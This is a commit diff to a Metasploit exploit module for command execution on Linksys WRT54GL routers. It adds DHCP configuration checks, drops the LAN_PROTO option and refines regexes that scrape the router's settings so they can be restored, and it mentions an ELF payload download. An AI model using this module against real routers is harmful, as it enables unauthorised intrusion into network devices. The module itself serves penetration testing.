final regex, dhcp check and feedback from juan

modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb

@@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
 				OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ]),
-				OptString.new('LAN_PROTO', [ true, 'The device configuration for the local network, dhcp or static (default: dhcp)', 'dhcp' ]),
 			], self.class)
 	end
 
 
 	def get_config(config, pattern)
 		if config =~ /#{pattern}/
+			#print_line("found: #{$1}")	#debugging
 			return $1
 		end
 		return ""
@@ -107,15 +107,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
 		end
 
+		#now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!
 		@now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>")
 		if @now_proto_orig !~ /dhcp/
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
 		end
+		@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
+		if @wan_proto_orig !~ /dhcp/
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
+		end
+		@lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP")
 		@daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>")
 		@lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>")
 		@wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>")
 		@need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>")
-		@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
 		@lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\\(this\,1\,223\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>")
 		@lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">")
 		@lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">")
@@ -132,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		@dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,1\,253\,\"Number%20of%20DHCP%20users\"\\)\;Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>")
 		@dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ onChange=\"valid_dhcpd_start_ip\\(this.form\,\ this\\)\">")
 		@netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>")
-		@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)>")
+		@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3")
 		@wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>")
 		@wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>")
 		@wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>")
@@ -145,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		@wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>")
 		@wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>")
 		@wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>")
-		@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)>")
+		@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3")
 		@wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>")
 		@wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>")
 		@wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>")
@@ -199,7 +204,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s,
 					'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s,
 					'lan_netmask' => "255.255.255.#{@netmask_orig}",
-					'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
+					#'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
+					'lan_proto' => @lan_proto_orig.to_s,
 					'dhcp_check' => "1",
 					'dhcp_start' => @dhcp_start_orig.to_s,
 					'dhcp_num' => @dhcp_num_orig.to_s,
@@ -243,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rport = datastore['RPORT']
 		restore = datastore['RESTORE_CONF']
 		@timeout = 10
-		@lan_proto_manual = datastore['LAN_PROTO']
+		#@lan_proto_manual = datastore['LAN_PROTO']
 
 		#
 		# testing Login